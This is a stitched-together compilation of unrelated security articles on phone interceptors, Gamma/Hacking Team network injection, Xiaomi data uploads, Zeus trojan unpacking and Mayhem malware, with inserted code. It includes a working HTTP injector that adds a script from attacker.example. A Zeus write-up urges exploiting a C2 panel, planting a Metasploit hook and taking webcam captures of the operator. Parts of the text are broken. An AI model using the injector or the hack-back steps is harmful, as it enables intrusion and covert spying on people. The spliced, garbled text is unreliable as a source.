“The baseband processor is one of the more difficult things to get into or even communicate with,” says Mathew Rowley, a senior security consultant at Matasano Security.  “[That’s] because my computer doesn’t speak 4G or GSM, and also all those protocols are encrypted.  You have to buy special hardware to get in the air and pull down the waves and try to figure out what they mean.  It’s just pretty unrealistic for the general community.”

But for governments or other entities able to afford a price tag of “less than $100,000,” says Goldsmith, high-quality interceptors are quite realistic. Some interceptors are limited, only able to passively listen to either outgoing or incoming calls. But full-featured devices like the VME Dominator, available only to government agencies, can not only capture calls and texts, but even actively control the phone, sending out spoof texts, for example. Edward Snowden revealed that the N.S.A. is capable of an over-the-air attack that tells the phone to fake a shut-down while leaving the microphone running, turning the seemingly deactivated phone into a bug. And various ethical hackers have demonstrated DIY interceptor projects, using a software-defined radio and the open-source base station software package OpenBTS – this creates a basic interceptor for less than $3,000. On August 11, the F.C.C. announced an investigation into the use of interceptors against Americans by foreign intelligence services and criminal gangs.

An “Over-the-Air” Attack Feels Like Nothing

Whenever he wants to test out his company’s ultra-secure smart phone against an interceptor, Goldsmith drives past a certain government facility in the Nevada desert.  (To avoid the attention of the gun-toting counter-intelligence agents in black SUVs who patrol the surrounding roads, he won’t identify the facility to Popular Science).  He knows that someone at the facility is running an interceptor, which gives him a good way to test out the exotic “baseband firewall” on his phone.  Though the baseband OS is a “black box” on other phones, inaccessible to manufacturers and app developers, patent-pending software allows the GSMK CryptoPhone 500 to monitor the baseband processor for suspicious activity.

So when Goldsmith and his team drove by the government facility in July, he also took a standard Samsung Galaxy S4 and an iPhone to serve as a control group for his own device.

“As we drove by, the iPhone showed no difference whatsoever. The Samsung Galaxy S4, the call went from 4G to 3G and back to 4G. The CryptoPhone lit up like a Christmas tree.”

Though the standard Apple and Android phones showed nothing wrong, the baseband firewall on the CryptoPhone set off alerts showing that the phone’s encryption had been turned off, and that the cell tower had no name – a telltale sign of a rogue base station. Standard towers, run by, say, Verizon or T-Mobile, will have a name, whereas interceptors often do not.


And the interceptor also forced the CryptoPhone from 4G down to 2G, a much older protocol whose ciphers can be broken in real time and whose encryption the network can simply switch off, as the “Ciphering Disabled” alert shows. But the standard smart phones didn’t even show they’d experienced the same attack.

“If you’ve been intercepted, in some cases it might show at the top that you’ve been forced from 4G down to 2G.  But a decent interceptor won’t show that,” says Goldsmith.  “It’ll be set up to show you [falsely] that you’re still on 4G.  You’ll think that you’re on 4G, but you’re actually being forced back to 2G.”
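The indicators the article describes (ciphering switched off, a tower that broadcasts no operator name, a forced drop from 4G to 2G) can be written down as plain checks over what the baseband reports. What follows is an added example written for this page, not code from GSMK, ESD America or the CryptoPhone’s baseband firewall: the observation fields, the home network and the way radio generations are ranked are assumptions, and, as Goldsmith’s last quote warns, the downgrade check is only as good as the baseband’s honesty about which network the phone is really on, which is exactly why a firewall sitting on the baseband is the interesting part of his product.

```python
"""
Rogue-base-station scoring over constructed cell observations.

Added example (not from the article or from GSMK/ESD America).  The three
indicators named in the article are modelled as simple heuristics: ciphering
off, a tower with no operator name, and a forced 4G->2G downgrade.  Field
names, the home PLMN and the thresholds are assumptions.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class CellObservation:
    plmn: str                 # MCC+MNC of the network the tower claims, e.g. "310260"
    cell_id: int              # cell identifier reported by the baseband
    rat: str                  # radio access technology: "LTE", "UMTS" or "GSM"
    cipher: Optional[str]     # GSM cipher in use: "A5/1", "A5/3", "A5/0" (none); None = n/a
    operator_name: str        # network name broadcast by the tower ("" if absent)


# Constructed "known good" state for the subscriber: home network and the
# generation the phone normally camps on in this area (assumptions).
HOME_PLMN = "310260"
EXPECTED_RAT = "LTE"
RAT_RANK = {"GSM": 2, "UMTS": 3, "LTE": 4}   # generation number, for downgrade checks


def score_observation(obs: CellObservation, prev: Optional[CellObservation]) -> List[str]:
    """Return the indicators that fire for a single observation."""
    flags: List[str] = []
    # 1. Ciphering disabled: on GSM the network picks the cipher, and A5/0 means
    #    none at all; ordinary handsets do not surface that to the user.
    if obs.rat == "GSM" and obs.cipher == "A5/0":
        flags.append("ciphering disabled (A5/0)")
    # 2. A tower claiming the home PLMN but broadcasting no operator name.
    if obs.plmn == HOME_PLMN and not obs.operator_name:
        flags.append("tower broadcasts no operator name")
    # 3. Downgrade: camped on an older generation than expected, or dropped a
    #    generation relative to the previous observation.
    if RAT_RANK[obs.rat] < RAT_RANK[EXPECTED_RAT]:
        flags.append(f"camped on {obs.rat} instead of {EXPECTED_RAT}")
    if prev is not None and RAT_RANK[obs.rat] < RAT_RANK[prev.rat]:
        flags.append(f"downgrade {prev.rat} -> {obs.rat}")
    return flags


def analyse(trace: List[CellObservation]) -> Dict[int, List[str]]:
    """Map cell_id -> indicators for every observation that raised at least one.
    Assumes the trace is in chronological order."""
    report: Dict[int, List[str]] = {}
    prev: Optional[CellObservation] = None
    for obs in trace:
        flags = score_observation(obs, prev)
        if flags:
            report.setdefault(obs.cell_id, []).extend(flags)
        prev = obs
    return report


# Constructed trace: two legitimate LTE cells, then a nameless GSM cell that
# turns ciphering off, then the phone returns to LTE.
SAMPLE_TRACE = [
    CellObservation("310260", 1001, "LTE", None, "T-Mobile"),
    CellObservation("310260", 1002, "LTE", None, "T-Mobile"),
    CellObservation("310260", 7, "GSM", "A5/0", ""),
    CellObservation("310260", 1002, "LTE", None, "T-Mobile"),
]

if __name__ == "__main__":
    for cell, flags in analyse(SAMPLE_TRACE).items():
        print(f"cell {cell}: " + "; ".join(flags))
```

Run stand-alone it reports only cell 7, with all four indicators. A single indicator is weak on its own (rural 2G coverage and unnamed test cells exist), which is why a real implementation scores several together rather than alerting on any one.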

So Do I Need One?

Though Goldsmith won’t disclose sales figures or even a retail price for the GSMK CryptoPhone 500, he doesn’t dispute an MIT Technology Review article from this past spring reporting that he produces about 400 phones per week for $3,500 each.  So should ordinary Americans skip some car payments to be able to afford to follow suit?

It depends on what level of security you expect, and who you might reasonably expect to be trying to listen in, says Oliver Day, who runs Securing Change, an organization that provides security services to non-profits.

“There’s this thing in our industry called “threat modeling,” says Day.  “One of the things you learn is that you have to have a realistic sense of your adversary. Who is my enemy?  What skills does he have?  What are my goals in terms of security?”

If you’re not realistically of interest to the U.S. government and you never leave the country, then the CryptoPhone is probably more protection than you need. Goldsmith says he sells a lot of phones to executives who do business in Asia. The aggressive, sophisticated hacking teams working for the People’s Liberation Army have targeted American trade secrets, as well as political dissidents.

Day, who has written a paper about undermining censorship software used by the Chinese government, recommends people in hostile communications environments watch what they say over the phone and buy disposable “burner” phones that can be used briefly and then discarded.

“I’m not bringing anything into China that I’m not willing to throw away on my return trip,” says Day.


Goldsmith warns that a “burner phone” strategy can be dangerous. If Day were to call another person on the Chinese government’s watch list, his burner phone’s number would be added to the watch list, and then the government would watch to see who else he called. The CryptoPhone 500, in addition to alerting the user whenever it’s under attack, can “hide in plain sight” when making phone calls. Though it does not use standard voice-over-IP or virtual private network security tools, the CryptoPhone can make calls using just a Wi-Fi connection — it does not need an identifiable SIM card. When calling over the Internet, the phone appears to eavesdroppers as if it is just browsing the Internet.

U.S. firm helped the spyware industry build a potent digital weapon for sale overseas


CloudShield Technologies, a California defense contractor, dispatched a senior engineer to Munich in the early fall of 2009. His instructions were unusually opaque.

As he boarded the flight, the engineer told confidants later, he knew only that he should visit a German national who awaited him with an off-the-books assignment. There would be no written contract, and on no account was the engineer to send reports back to CloudShield headquarters.

His contact, Martin J. Muench, turned out to be a former developer of computer security tools who had long since turned to the darkest side of their profession. Gamma Group, the British conglomerate for which Muench was a managing director, built and sold systems to break into computers, seize control clandestinely, and then copy files, listen to Skype calls, record every keystroke and switch on Web cameras and microphones at will.


According to accounts the engineer gave later and contemporary records obtained by The Washington Post, he soon fell into a shadowy world of lucrative spyware tools for sale to foreign security services, some of them with records of human rights abuse.

Over several months, the engineer adapted Gamma’s digital weapons to run on his company’s specialized, high-speed network hardware. Until then CloudShield had sold its CS-2000 device, a multipurpose network and content processing product, primarily to the Air Force and other Pentagon customers, who used it to manage and defend their networks, not to attack others.

CloudShield’s central role in Gamma’s controversial work — fraught with legal risk under U.S. export restrictions — was first uncovered by Morgan Marquis-Boire, author of a new report released Friday by the Citizen Lab at the University of Toronto’s Munk School of Global Affairs. He shared advance drafts with The Post, which conducted its own month-long investigation.


The prototype that CloudShield built was never brought to market, and the company parted ways with Gamma in 2010. But Marquis-Boire said CloudShield’s work helped pioneer a new generation of “network injection appliances” sold by Gamma and its Italian rival, Hacking Team. Those devices pair malicious software with specialized equipment attached directly to the central switching points of a foreign government’s national Internet grid.

The result: Merely by playing a YouTube video or visiting a Microsoft Live service page, for instance, an unknown number of computers around the world have been implanted with Trojan horses by government security services that siphon their communications and files. Google, which owns YouTube, and Microsoft are racing to close the vulnerability.

Citizen Lab’s report, based on leaked technical documents, is the first to document that commercial spyware companies are making active use of this technology. Network injection allows products built by Gamma and Hacking Team to insert themselves into an Internet data flow and change it undetectably in transit.

The report calls that “hacking on easy mode,” in which “compromising a target becomes as simple as waiting for the user to view unencrypted content on the Internet.”
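What “inserting themselves into an Internet data flow” means in practice is easiest to see against a cleartext HTTP response. The following is an added example written for this page, not code from Citizen Lab, Gamma or Hacking Team: a toy in-path injector rewrites an unencrypted HTML response so that the browser loads an extra script, and the same bytes carried under an integrity tag are rejected as soon as they are altered. The response, the payload, the hostnames and the key are all constructed, and the HMAC only stands in for the per-record integrity that an encrypted transport such as TLS provides; it is not itself a substitute for TLS.

```python
"""
Network injection against cleartext HTTP, and why encryption stops it.

Added example, not code from Citizen Lab, Gamma or Hacking Team.  The page,
the payload, the hostnames and the key are constructed; the HMAC models the
integrity check an encrypted transport performs on every record.
"""
import hashlib
import hmac

# Constructed cleartext response that a video page might return.
_BODY = b'<html><body><video src="cute.mp4"></video></body></html>'
ORIGINAL_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: %d\r\n\r\n" % len(_BODY)
) + _BODY
# Constructed payload; attacker.example is a placeholder host.
PAYLOAD = b'<script src="http://attacker.example/implant.js"></script>'


def inject(response: bytes, payload: bytes) -> bytes:
    """Rewrite a cleartext HTTP response in transit: insert `payload` before
    </body> and fix Content-Length so the browser accepts the frame.  Only
    HTML responses are touched, as a real injector would filter on type."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        return response                      # no complete header block; pass through
    headers = head.split(b"\r\n")
    if not any(h.lower().startswith(b"content-type: text/html") for h in headers):
        return response                      # not a page; leave it alone
    new_body = body.replace(b"</body>", payload + b"</body>", 1)
    new_headers = [
        b"Content-Length: %d" % len(new_body)
        if h.lower().startswith(b"content-length:") else h
        for h in headers
    ]
    return b"\r\n".join(new_headers) + sep + new_body


def seal(response: bytes, key: bytes) -> bytes:
    """Append an HMAC-SHA256 tag; stands in for the record MAC of an
    encrypted transport (a real transport also hides the bytes)."""
    return response + hmac.new(key, response, hashlib.sha256).digest()


def open_sealed(sealed: bytes, key: bytes) -> bytes:
    """Verify the tag in constant time; raise if the bytes were altered."""
    body, tag = sealed[:-32], sealed[-32:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed: response modified in transit")
    return body


def cleartext_attack() -> bool:
    """True when the injected script reaches the browser with a consistent
    Content-Length, i.e. nothing on the receiving side can tell."""
    delivered = inject(ORIGINAL_RESPONSE, PAYLOAD)
    expected_len = b"Content-Length: %d" % (len(_BODY) + len(PAYLOAD))
    return PAYLOAD in delivered and expected_len in delivered


def protected_attack(key: bytes = b"constructed-session-key") -> bool:
    """True when the same injection against the sealed response is detected."""
    sealed = seal(ORIGINAL_RESPONSE, key)
    tampered = inject(sealed, PAYLOAD)       # the injector still rewrites the bytes...
    try:
        open_sealed(tampered, key)
    except ValueError:
        return True                          # ...but the recipient rejects the record
    return False


if __name__ == "__main__":
    print("cleartext: injection reaches browser unnoticed:", cleartext_attack())
    print("sealed:    injection detected and rejected:    ", protected_attack())
```

The injector never needs an exploit in the page itself; it only needs to be in the path and to see cleartext, which is the point of the “hacking on easy mode” remark above and of the rush to encrypt described below.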

Attacks of that kind were the stuff of hacker imaginings until this year, when news accounts based on documents provided by former National Security Agency contractor Edward Snowden described a somewhat similar NSA program code-named QUANTUMINSERT.


“It has been generally assumed that the best funded spy agency in the world would possess advanced capability,” the Citizen Lab report says. “What is perhaps more surprising is that this capability is being developed by Western vendors for sale on the commercial market.”

Hacking Team and the company that now owns CloudShield denied any wrongdoing. Messages left with Gamma went unreturned.

The “custom payload” that Hacking Team uses to compromise YouTube injects malicious code into the video stream when a visitor clicks the play button. The user sees the “cute animal videos” he expects, according to Citizen Lab, but the malicious code exploits a flaw in Adobe’s Flash video player to take control of the computer.

Another attack, custom-built for use on Microsoft pages, uses Oracle’s Java technology, another common browser component, to insert a back door into a victim’s computer.

Security and privacy advocates have identified those vulnerabilities before, but the two companies regarded them as hypothetical. In response to a bug report in September 2012, which warned of a potential YouTube attack, Google’s security team responded that the use of unencrypted links to send video “is expected behavior.” Google closed the discussion with the tag “WontFix.”

‘Against our will’

After Marquis-Boire disclosed to them confidentially last month that their services are under active attack, Google and Microsoft began racing to close security holes in networks used by hundreds of millions of users.

“I want to be sure there’s no technical means for people to take a user’s data against our will,” Eric Grosse, Google’s vice president for security engineering, said in an interview. “If they want to do that, they need to use legal means and we pursue that.”

Google and Microsoft executives said they are accelerating previous plans to encrypt their links to users across a wider range of their services. Encryption scrambles e-mail, stored files, video and other content as it travels from their servers to a user’s computer or mobile device. That step, as far as security engineers know, effectively prevents most attacks in current use.

Since learning of Marquis-Boire’s findings in mid-July, Google has encrypted a majority of YouTube video links, and Microsoft has changed default settings to prevent unencrypted log-ins on most services.

“There’s a lot of products to update so we’re not at 100 percent yet but we’re actively engaged with all the teams,” Grosse said, acknowledging that Google Maps, Google Earth and other services still connect to users in ways that can easily be intercepted.

Grosse said comprehensive use of encryption should now be regarded as a basic responsibility of Internet services to their users.

“We’re probably already [encrypted] to a sufficiently high level that I would guess our adversaries are already having to scramble and shift to some other widely-used service that has not gone to SSL,” he said, referring to a form of encryption called the Secure Sockets Layer, which is indicated by a padlock icon on some browsers.

Matt Thomlinson, Microsoft’s vice president of security, said in a statement that his company “would have significant concerns if the allegations of an exploit being deployed are true.”

“We have been rolling out advanced security across our web properties to continue to help protect our customers,” he added.

In computer circles, any unencrypted data is known as “cleartext.” Marquis-Boire, expanding on a theme that other security researchers have emphasized since disclosures of National Security Agency programs began 14 months ago, said “the big take-away is that cleartext is just dead.”

“Unencrypted traffic is untrustworthy,” he said. “I would describe this as a sad reality of today’s Internet. The techno-Utopian, libertarian ideology of the ’90s didn’t foresee that the Internet would be as militarized as it is now. People with authority and power have decided to reserve the right to ‘own’ Internet users at the core. So in order to be safe you need to walk around everywhere wrapped in encryption.”

‘Lawful intercept’

The computer exploitation industry markets itself to foreign government customers in muscular terms. One Gamma brochure made public by WikiLeaks described its malware injection system, called FinFly ISP, as a “strategic, countrywide” solution with nearly unlimited “scalability,” or capacity for expansion. Hacking Team, similarly, says it provides “effective, easy-to-use offensive technology to the worldwide law enforcement and intelligence communities.”

In rare comments to the general public, the companies use the term “lawful intercept” to describe their products and say they do not sell to customers on U.S., European or U.N. black lists.

“Our software is designed to be used and is used to target specific subjects of investigation,” said Eric Rabe, a U.S.-based spokesman for Hacking Team, in an extended e-mail interview. “It is not designed or used to collect data from a general population of a city or nation.”

He declined to discuss details of the Citizen Lab report, which is based in part on internal company documents leaked to Marquis-Boire, but he appeared to acknowledge indirectly that the material was authentic.

“We believe the ongoing Citizen Lab efforts to disclose proprietary Hacking Team information is misguided, because, if successful for Citizen Lab, it not only harms our business but also gives the advantage to criminals and terrorists,” he said.

CloudShield’s founder, Peder Jungck, who oversaw the company’s relationship with Gamma before departing for a job with the British defense giant BAE Systems, did not respond to requests for comment.

Confidants of the CloudShield engineer, who has since left the company after becoming disillusioned with its surveillance work, identified him as Eddy Deegan, a British citizen. Deegan’s LinkedIn profile says he worked for the company as a professional services engineer during the period in question. Reached by telephone in France, Deegan declined to confirm or deny the identity of his external customer in late 2009.

“Nothing came of the work I was involved in at the time,” he said. “I asked, and was assured that nothing illegal was undertaken. I have no further comment.”

U.S. export restrictions, enforced by the Commerce Department, require a license for any foreign sale of technology described in the relevant statute as “primarily useful for the purpose of the surreptitious interception of wire, oral, or electronic communications.”

Jennifer Gephart, the media relations director for Leidos, which now owns CloudShield, declined to say whether the company had applied for an export license for the Gamma project. The transactions in question took place “prior to our company’s acquisition of CloudShield,” she said, but “to our knowledge” they were “handled in accordance with applicable regulations.”

Gephart confined her statement to the sale of CloudShield’s CS-2000 hardware. When asked about the company’s development of custom software to turn the device into a spyware delivery system, she declined to respond.

Robert Clifton Burns, who specializes in export controls at the law firm Bryan Cave, said that “surreptitious listening devices are covered and the software for that is also covered on the Commerce Control List.”

The regulations are complex and inconsistent, he said, and an authoritative legal judgment would require more facts. CloudShield might argue, he said, that malware injection is not “primarily useful” for surreptitious eavesdropping because it can also be used to track a target’s location, take photographs or steal electronic files. Although more intrusive, those attacks were not covered under the rules that applied in 2009.

The Gamma Group lists no e-mail address or telephone number on its Web site. No one responded to a lengthy note left on the company’s “Contact” page.

Muench, who has left his old job for a new position in France, read a LinkedIn message requesting an interview. He did not respond. In the past he has dismissed human rights concerns as unproven and defended Gamma’s products as vital for saving innocent lives. “The most frequent fields of use are against pedophiles, terrorists, organized crime, kidnapping and human trafficking,” he told the New York Times two years ago.

Security researchers have documented clandestine sales of Gamma and Hacking Team products to “some of the world’s most notorious abusers of human rights,” said Ron Deibert, the director of Citizen Lab, a list that includes Turkmenistan, Egypt, Bahrain and Ethiopia.

At CloudShield, executives knew the identity of at least one prospective customer for the system Deegan built. A former manager told The Post, with support from records obtained elsewhere, that CloudShield sent Deegan to Oman to plan a deployment for one of the country’s internal security services. The sale did not go through.

In its annual assessment of human rights that year, the State Department reported that Oman “monitored private communications” without legal process in order to “suppress criticism of government figures and politically objectionable views.”

‘A push market’

CloudShield did not see itself as a cloak-and-dagger company. It made its name for high-end hardware that could peer deeply into Internet traffic and pull out and analyze “packets” of data as they flew by.

The flagship product five years ago, the CS-2000, could not only look inside the data flow, but select parts of it to copy or reroute. That made it a good tool for filtering out unwanted data or blocking certain forms of cyberattack.

But hardware that could block data selectively could also rewrite innocent traffic to include malicious code. That meant the CloudShield product could be used for attack as well as defense, a former executive said.

CloudShield began pitching its product for offensive use, focusing on U.S. customers because of export controls.

“The basic motivations are pretty straightforward,” said one former senior manager there. “It was a push market. We were trying to sell boxes. It was a very conscious effort to target lawful intercept as a space where you could legitimately apply these kinds of technologies.”

Two former employees said that Muench, the Gamma executive, traveled to Sunnyvale, Calif., in 2009 in hopes of striking a business relationship. Jungck, CloudShield’s founder and chief technology officer, said he could not export that kind of technology and sent Muench home.

But the leadership team reconsidered, and hit upon a plan. They believed that Deegan could do the work for Gamma without triggering U.S. export controls as long as CloudShield’s U.S. operations had nothing to do with it.

“I think we all had qualms in the beginning,” said one former executive who took part in the deliberations. “I think we rationalized a way in which we felt comfortable with it. Part of that rationalization was to keep it outside the U.S., limit it to that environment where that project was.”

What first appeared as an absorbing technical challenge for Deegan began to take a darker cast. His prototype system could inject any of “254 trojans,” or all of them, into a targeted computer. If it failed once, it would keep trying, up to 65,000 times.

He was proud of his technical accomplishments, he told confidants, but was no longer sure he had done the right thing. After meeting prospective customers in Oman, his qualms grew worse.

In the end, the Oman deal fell through, and other efforts, with other partners failed, too. CloudShield and Gamma parted ways, and Gamma found another hardware supplier. Deegan’s prototype, according to Marquis-Boire and a CloudShield insider, may have sped development of the flagship surveillance product that Gamma brought to market the following year.

Julie Tate contributed to this report.



Security firm shows Xiaomi smartphones secretly stealing your data


It appears that Xiaomi phones send data from the phone directly to Xiaomi’s central servers.

According to Xiaomi’s ‘Privacy Policy’ document at , it does seem that certain data is sent from the smartphone to Xiaomi.



Update 2: Hugo Barra has now confirmed with us that the OTA update that will make MIUI’s Cloud Messaging service opt-in will be available for all Xiaomi phones.

Update: Hugo Barra has now addressed F-Secure’s findings, stating that the data being uploaded is part of MIUI’s Cloud Messaging service. An update rolling out today will now make MIUI opt-in, and will no longer automatically activate for new users:

These concerns refer to the MIUI Cloud Messaging service described above. As we believe it is our top priority to protect user data and privacy, we have decided to make MIUI Cloud Messaging an opt-in service and no longer automatically activate users. We have scheduled an OTA system update for today (Aug 10th) to implement this change.

After the upgrade, new users or users who factory reset their devices can enable the service by visiting “Settings > Mi Cloud > Cloud Messaging” from their home screen or “Settings > Cloud Messaging” inside the Messaging app — these are also the places where users can turn off Cloud Messaging.

Following allegations that Xiaomi phones may be silently uploading user details to a remote server, Finnish security firm F-Secure set out to investigate.

The firm has now published a blog post detailing how a brand new Xiaomi RedMi 1S smartphone silently uploaded a user’s phone number, the network being used, the phone’s IMEI number, as well as the phone’s entire list of contacts to a Xiaomi server.

The security company said that it took a brand new smartphone out of the box with no prior set-up and no cloud connection allowed. It then performed the following steps:

  1. Inserted SIM card
  2. Connected to WiFi
  3. Allowed the GPS location service
  4. Added a new contact into the phonebook
  5. Sent and received an SMS and MMS message
  6. Made and received a phone call

F-Secure said, “We saw that on startup, the phone sent the telco name to the server. It also sent IMEI and phone number to the same server.”

Xiaomi data


The company then repeated the above steps, but this time connecting to the Mi Cloud service. This time around the IMSI (used to identify the subscriber on a cellular network) was sent as well, along with the IMEI and phone number.

This evidence seems contrary to Xiaomi Vice President Hugo Barra’s claims when he addressed Xiaomi security concerns in a Google+ post last week, stating “Xiaomi is serious about user privacy and takes all possible steps to ensure our Internet services adhere to our privacy policy. We do not upload any personal information and data without the permission of users.”

Source: F-Secure


How to bypass Zeus trojan self protection mechanism

Hacking spammer’s for Dummies


How to bypass Zeus Trojan’s self protection mechanism


Spammers are good at intimidating users into opening the attachment. One of the recent pathetic and cruel ones was:


A person from your office was found dead outside. Please open the picture to see if you know him.


The attachment is basically a Zip file containing an exe file named “image.scr” with a nice mspaint icon.

Quickly opening it up in IDA gives us a hint that it is basically a VB packer. VB packers usually create a hollow suspended process, overwrite its memory and resume it.


After successfully unpacking and fixing the dump we get the following output:


The OEP of the unpacked binary is enough to tell us that it is a Zeus banking Trojan. This one is a different version of Zeus with self-protection, which means unpacked copies won’t run. This is usually done to “force” the bot masters to buy a cryptor service.

If you double-click the binary it will not run; it will simply exit. Now let’s see where things are going wrong and how to bypass the protection.

For that purpose we will generate an API call graph of the unpacked binary to see the exit point of the program.



From this we get the idea that it is reading a file buffer and performing some operations on it; now let’s see what operations it performs.

If we dig deeper we find that the file buffer is read and some cryptographic operations are performed on it.


And if we go inside the CheckSelfProtection() function we observe that it RC4-decrypts the whole binary buffer with a static encryption key and searches for the placeholder “DAVE”.

In my case the RC4 key was


Packer integrity


We can copy that 0x200-byte data from the packer into the overlay of our unpacked file.

If it is found, the routine goes on to verify the integrity of that data structure and decodes another payload using a 4-byte XOR key taken from the structure.

The total size of the data structure is 0x200 bytes, and on the basis of its size field either the installer or the injector is decrypted. Let us now understand the layout of that 0x200-byte data structure.

During the installation phase iSizeOfPacket bytes are copied from the data chunk into the heap and later used to decode the installer subroutine with an XOR cipher.


    // 010 Editor binary template for the 0x200-byte packer overlay;
    // the SetBackColor() calls only colour the fields in the hex view.
    typedef struct {
        DWORD        SIGNATURE;          SetBackColor( cRed );
        DWORD        Crc32HASH;          SetBackColor( cBlue );
        WORD         iSizeOfPacket;
        unsigned int SizeOfDecodedData;
        unsigned int Unknown1;           SetBackColor( cRed );
        unsigned int XorKey;
    } Zeus_Packer_OverLay;

Before decoding the installer routine, the CRC32 hash is checked and SizeOfDecodedData bytes are copied to a heap location in this function.


The installer and injector are differentiated by the iSizeOfPacket field: if the size is 0x0c then it is still in the installation phase; if it is 0x1e6 then the structure has been replaced by the installation routine with a new packer data structure.

The installation subroutine is then decoded with XorKey over a data buffer of size SizeOfDecodedData using this simple XOR function.
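As an added analyst helper (not code from the original post), the following Python script locates the overlay by RC4-decrypting a buffer and searching for “DAVE”, parses the header fields listed above, verifies the CRC32 and XOR-decodes the installer data. The RC4 key, the little-endian packed field layout, the assumption that Crc32HASH covers the SizeOfDecodedData bytes after the header, and the repeating 4-byte XOR are all assumptions of this example, and the sample data is constructed.

```python
import struct
import zlib

# Constructed example: the values below are assumptions for illustration,
# not values recovered from the sample described in the post.
SIGNATURE = b"DAVE"        # placeholder the self-protection routine searches for
OVERLAY_LEN = 0x200        # total size of the packer data structure
SIZE_INSTALLER = 0x0c      # iSizeOfPacket while still in the installation phase
SIZE_INSTALLED = 0x1e6     # iSizeOfPacket once replaced by the installation routine

# Field order from the template above; packed little-endian is an assumption.
# DWORD SIGNATURE, DWORD Crc32HASH, WORD iSizeOfPacket,
# unsigned int SizeOfDecodedData, unsigned int Unknown1, unsigned int XorKey
HEADER_FMT = "<4sIHIII"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 22 bytes


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor4(data: bytes, key: int) -> bytes:
    """Repeating 4-byte XOR with XorKey (assumed form of the 'simple XOR function')."""
    kb = struct.pack("<I", key)
    return bytes(b ^ kb[i % 4] for i, b in enumerate(data))


def find_overlay(blob: bytes, rc4_key: bytes):
    """RC4 the whole buffer with the static key and look for the DAVE placeholder."""
    plain = rc4(rc4_key, blob)
    off = plain.find(SIGNATURE)
    if off < 0 or off + OVERLAY_LEN > len(plain):
        return None
    return plain[off:off + OVERLAY_LEN]


def parse_overlay(overlay: bytes) -> dict:
    """Parse the header, verify the CRC32 and report which phase the sample is in."""
    sig, crc, size_packet, size_decoded, unknown1, xor_key = struct.unpack_from(
        HEADER_FMT, overlay, 0)
    if sig != SIGNATURE:
        raise ValueError("bad signature")
    body = overlay[HEADER_LEN:HEADER_LEN + size_decoded]
    # Assumption: Crc32HASH covers the SizeOfDecodedData bytes that follow the header.
    if zlib.crc32(body) != crc:
        raise ValueError("CRC32 mismatch: overlay corrupted or wrong RC4 key")
    phase = {SIZE_INSTALLER: "installer", SIZE_INSTALLED: "installed"}.get(
        size_packet, "unknown")
    return {"phase": phase, "size_packet": size_packet, "xor_key": xor_key,
            "unknown1": unknown1, "body": body}


def decode_installer(overlay: bytes) -> bytes:
    """XOR-decode the installer subroutine with XorKey over SizeOfDecodedData bytes."""
    info = parse_overlay(overlay)
    return xor4(info["body"], info["xor_key"])


def build_sample_overlay(payload: bytes, xor_key: int,
                         size_packet: int = SIZE_INSTALLER) -> bytes:
    """Constructed test fixture: build a 0x200-byte overlay the way the parser expects."""
    encoded = xor4(payload, xor_key)
    if HEADER_LEN + len(encoded) > OVERLAY_LEN:
        raise ValueError("payload does not fit in the overlay")
    header = struct.pack(HEADER_FMT, SIGNATURE, zlib.crc32(encoded),
                         size_packet, len(encoded), 0, xor_key)
    return (header + encoded).ljust(OVERLAY_LEN, b"\x00")


if __name__ == "__main__":
    rc4_key = b"constructed-static-key"     # stands in for the key recovered from a sample
    payload = b"constructed installer stub"  # stands in for the real installer subroutine
    overlay = build_sample_overlay(payload, 0xDEADBEEF)
    packed = rc4(rc4_key, b"\x90" * 0x40 + overlay)  # fake binary: padding + overlay
    found = find_overlay(packed, rc4_key)
    print(parse_overlay(found)["phase"], decode_installer(found))
```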


During the installation phase the packer data structure is rewritten and encrypted using RC4, resulting in data of length 0x1e6 which mainly consists of installation data such as:

1 : Registry keys
2 : Random numbers generated for seeding
3 : Local path name
4 : Computer name and version


Replacing this packer overlay data with the old one will let you skip the installation phase, and the binary won’t be relaunched using CreateProcessA from %appdata%. Yet we will have to patch a jump after it compares the path stored in the overlay data with the current path.


Owning a Zeus C2C panel / Spammer

There exists a publicly known RCE vulnerability in some versions of Zeus (as well as Zeus Lite, KINS and ICE-IX), as described in detail here ( . Our good friend Xylitol has already provided a ready-to-use tool to exploit this vulnerability:

All we need for that is the C2C web address and the RC4 communication key. Both of them can be obtained from the base config decoding subroutine, which is again based on a simple XOR cipher.


After getting the C2C address and RC4 key, they can be submitted here to get a shell on that C2C web panel.


Once you get the shell you can edit cp.php (the login file for the Zeus panel) and boost your Metasploit exploit after the bot master has logged in.


And if you know how to proceed further, you can get a Meterpreter shell on the spammer’s machine. webcam_snap is one beautiful Meterpreter command which I personally like (

It takes a webcam capture from the victim’s computer and saves it on the target machine.

And if you enter that, you might get back something like this on your computer :)


There is new malware: Mayhem,new-mayhem-malware-targets-linux-unix-servers.aspx

New Mayhem malware targets Linux, UNIX servers

Infections found in Australia and New Zealand.

A new piece of malware that runs on UNIX-like servers even with restricted privileges has already infected machines in Australia and is actively hunting for more targets, a new research paper has shown.

Three researchers from Russian web provider Yandex – Andrej Kovalev, Konstantin Ostrashkevich and Evgeny Sidorov – said in the technical analysis of the malware, published on security and anti-virus specialist publication Virus Bulletin, that Mayhem functions like a traditional Windows bot.

Mayhem was discovered in April this year and does not require a privilege escalation vulnerability – it does not have to run as the root super user – to work on Linux-based systems, or on FreeBSD servers.

Servers are infected through the execution of a hypertext preprocessor (PHP) script that establishes Mayhem on the victim computer and sets up a communications channel with a command and control server.

The malware can have different functionality depending on the type of plug-in downloaded to it by the botmaster in control, and stashed away in a hidden file system on the compromised server.

Some of the plug-ins provide brute force cracking of password functionality, while others crawl web pages to scrape information.

